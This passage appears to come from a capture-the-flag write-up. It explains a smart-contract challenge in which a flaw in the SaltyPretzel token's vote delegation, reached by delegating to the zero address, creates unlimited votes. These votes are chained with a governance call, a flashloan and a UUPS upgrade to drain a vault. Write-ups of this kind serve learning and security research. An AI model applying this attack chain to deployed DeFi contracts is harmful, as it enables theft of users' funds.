 46 | Using the `claim()` function, we are able to mint `100 ether` worth of SaltyPretzel tokens for ourselves. This can only be done once:
 47 | ```solidity
 48 | uint constant public SALTY_PRETZELS = 100 ether;
 49 | 
 50 | // ...
 51 | 
 52 | function claim() external {
 53 |     require(!claimed);
 54 |     claimed = true;
 55 |     saltyPretzel.mint(msg.sender, SALTY_PRETZELS);
 56 | }
 57 | ```
 58 | 
 59 | To solve the challenge, the `Setup` contract must have a balance of 100 diamonds:
 60 | ```solidity
 61 | function isSolved() external view returns (bool) {
 62 |     return diamond.balanceOf(address(this)) == DIAMONDS;
 63 | }
 64 | ```
 65 | 
 66 | As all the diamonds were transferred to the vault at the start of the challenge, we have to  find a way to drain the vault of its 100 diamonds...
 67 | 
 68 | ## The vulnerability
 69 | 
 70 | The `SaltyPretzel` contract implements its own accounting system to keep track of everyone's voting power. Users are also able to delegate their votes to another user, giving the delegatee more voting power. 
 71 | 
 72 | At the core of this vote accounting system are the `_delegate()` and `_moveDelegates()` functions:
 73 | ```solidity
 74 | function _delegate(address delegator, address delegatee)
 75 |     internal
 76 | {
 77 |     address currentDelegate = _delegates[delegator];
 78 |     uint256 delegatorBalance = balanceOf(delegator);
 79 |     _delegates[delegator] = delegatee;
 80 | 
 81 |     emit DelegateChanged(delegator, currentDelegate, delegatee);
 82 | 
 83 |     _moveDelegates(currentDelegate, delegatee, delegatorBalance);
 84 | }
 85 | 
 86 | function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal {
 87 |     if (srcRep != dstRep && amount > 0) {
 88 |         if (srcRep != address(0)) {
 89 |             uint32 srcRepNum = numCheckpoints[srcRep];
 90 |             uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0;
 91 |             uint256 srcRepNew = srcRepOld - amount;
 92 |             _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew);
 93 |         }
 94 | 
 95 |         if (dstRep != address(0)) {
 96 |             uint32 dstRepNum = numCheckpoints[dstRep];
 97 |             uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0;
 98 |             uint256 dstRepNew = dstRepOld + amount;
 99 |             _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew);
100 |         }
101 |     }
102 | }
103 | ```
104 | 
105 | `_delegate()` first sets the `delegatee` of `delegator`, then calls `_moveDelegates()` to transfer the balance of `delegator` (ie. his votes) from the old delegatee to the new one.
106 | 
107 | `_moveDelegates()` then subtracts `amount` votes from `srcRep`, which in this case, would be the old delegatee, and adds them to `dstRep`, which would be the new delegatee. Notice the following checks:
108 | * If `srcRep == dstRep` or `amount == 0`, the function does not do anything. 
109 | * If `srcRep == address(0)`, the votes are not deducted from `srcRep`.
110 | * If `dstRep == address(0)`, the votes are not added to `dstRep`.
111 | 
112 | Users can also change their `delegatee` through the `delegate()` function:
113 | ```solidity
114 | function delegate(address delegatee) external {
115 |     return _delegate(msg.sender, delegatee);
116 | }
117 | ```
118 | 
119 | While looking at how `_moveDelegates()` is used, I noticed the following in `mint()`:
120 | ```solidity
121 | function mint(address _to, uint256 _amount) public onlyOwner {
122 |     _mint(_to, _amount);
123 |     _moveDelegates(address(0), _delegates[_to], _amount);
124 | }
125 | ```
126 | 
127 | When new tokens are minted, the contract has to "create" votes to increase the voting power of the recipient. To do so, `mint()` calls `_moveDelegates()` with `srcRep` as `address(0)`, which does not deduct votes from `srcRep` but simply adds them to `dstRep`.
128 | 
129 | This gave me an idea - if we could set our `delegatee` to `address(0)`, we would essentially be able to repeatedly create votes out of thin air, similar to `mint()`. Setting our `delegatee` to `address(0)` can be achieved by doing the following:
130 | 1. Transfer our SaltyPretzel tokens to another contract to make our balance 0.
131 | 2. Call `delegate()` with `address(0)` as our `delegatee`. This works as `_delegate()` would call `_moveDelegates()` with `amount = 0`, thus no transfer of votes occurs.
132 | 
133 | After setting `delegatee` to `address(0)`, we are able to increase the voting power of any other user through the following:
134 | * Transfer our SaltyPretzel tokens back to our address.
135 | * Call `delegate()`, with `delegatee` as the user we wish to add votes to. Note that `delegatee` cannot be our own address as `srcRep` cannot be equal to `dstRep` in `_moveDelegates()`, as mentioned above.
136 | 
137 | Thereforce, by repeatedly setting our `delegatee` to `address(0)`, then regaining our tokens and calling `delegate()`, we are able to increase anyone's voting power by any arbitrary amount.
138 | 
139 | ## Solving the challenge
140 | 
141 | Now that we have the ability to gain infinite votes, how do we solve the challenge?
142 | 
143 | As `Vault` is a `UUPSUpgradeable` proxy contract, it inherits the an `upgradeTo()` function, which can be used to upgrade the implementation contract of `Vault`:
144 | ```solidity
145 | function upgradeTo(address newImplementation) external virtual onlyProxy {
146 |     _authorizeUpgrade(newImplementation);
147 |     _upgradeToAndCallUUPS(newImplementation, new bytes(0), false);
148 | }
149 | ````
150 | 
151 | The `_authorizeUpgrade()` function is overridden in the current implementation of `Vault`: 
152 | ```solidity
153 | function _authorizeUpgrade(address) internal override view {
154 |     require(msg.sender == owner() || msg.sender == address(this));
155 |     require(IERC20(diamond).balanceOf(address(this)) == 0);
156 | }
157 | ```
158 | 
159 | To change the implementation of `Vault` to our own contract, the following two requirements have to be met:
160 | 1. `msg.sender` has to be either owner or `Vault` itself.
161 | 2. `Vault` must have no diamonds.
162 | 
163 | Since the owner of `Vault` is the `Setup` contract, the first criteria can only be achieved by calling `upgradeTo()` through the `Vault` itself. Luckily for us, `Vault` contains a `governanceCall()` function:
164 | ```solidity
165 | function governanceCall(bytes calldata data) external {
166 |     require(msg.sender == owner() || saltyPretzel.getCurrentVotes(msg.sender) >= AUTHORITY_THRESHOLD);
167 |     (bool success,) = address(this).call(data);
168 |     require(success);
169 | }
170 | ```
171 | 
172 | As we now have the ability to gain infinite votes, we can make `Vault` call any of its functions through `governanceCall()`. To meet the first requirement, we simply use `governanceCall()` to call `upgradeTo()`, which would make `msg.sender` the `Vault` itself.
173 | 
174 | To fulfil the second criteria, we utilize the `flashloan()` function:
175 | ```solidity
176 | function flashloan(address token, uint amount, address receiver) external {
177 |     uint balanceBefore = IERC20(token).balanceOf(address(this));
178 |     IERC20(token).transfer(receiver, amount);
179 |     IERC3156FlashBorrower(receiver).onFlashLoan(msg.sender, token, amount, 0, "");
180 |     uint balanceAfter = IERC20(token).balanceOf(address(this));
181 |     require(balanceBefore == balanceAfter);
182 | }
183 | ```
184 | We take out a flashloan to borrow all of `Vault`'s diamonds, and then make the `governanceCall() -> upgradeTo()` call in the `onFlashLoan()` callback. This way, when `upgradeTo()` is called, `Vault` will temporarily have no diamonds.
185 | 
186 | ## Exploit code
187 | The exploit contract, which implements the steps above, can be found in [`Exploit.sol`](Exploit.sol). It contains three contracts:
188 | * `Exploit` mainly handles abusing the vulnerability to gain sufficient votes.
189 | * `VoteCollector` is used to solve the challenge after it has enough votes.
190 | * `FakeVault` is the new vault implementation used to drain the vault.


--------------------------------------------------------------------------------